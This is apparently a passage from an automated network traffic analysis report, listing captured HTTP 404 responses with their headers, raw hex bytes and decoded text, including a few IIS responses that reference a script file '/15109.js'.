Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:19:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=IMGAOJLDCMNIMLMODGGMFGFI; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:20:15 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=JMGAOJLDLILAIHCOCPOKHOOP; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:20:17 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=KMGAOJLDIKNFMAKEOLLIMMHN; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:20:21 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:20:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:20:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:20:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:20:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:20:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:20:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:20:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:20:51 GMTContent-Type: text/htmlContent-Length: 111Connection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: "6f-5f409e82bbe87"Accept-Ranges: bytesData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 2d 6e 6f 74 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 48 31 3e 45 72 72 6f 72 20 6f 63 63 75 72 72 65 64 3a 20 34 30 34 20 2d 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 48 31 3e 3c 48 52 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>404-not found</TITLE></HEAD><BODY><H1>Error occurred: 404 - not found</H1><HR></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:21:01 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:21:04 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:21:07 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:21:09 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:21:23 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=kahpcrhmc91jd5qr9io18g7dam; expires=Mon, 20-Mar-2023 15:21:23 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YVAnt5MDF6HEYFMdNhnKl303boOUjkkBcawd7hik3Yrz%2FtHEbEDt%2B1Z%2BI17hTLin7W9pCjunGQBmpRkrYrUQGItRk2TOIy975P94qGKgwYzqSqk2RzZXsEtUqF8nm4EEkiQM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae99ebebb2383e-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 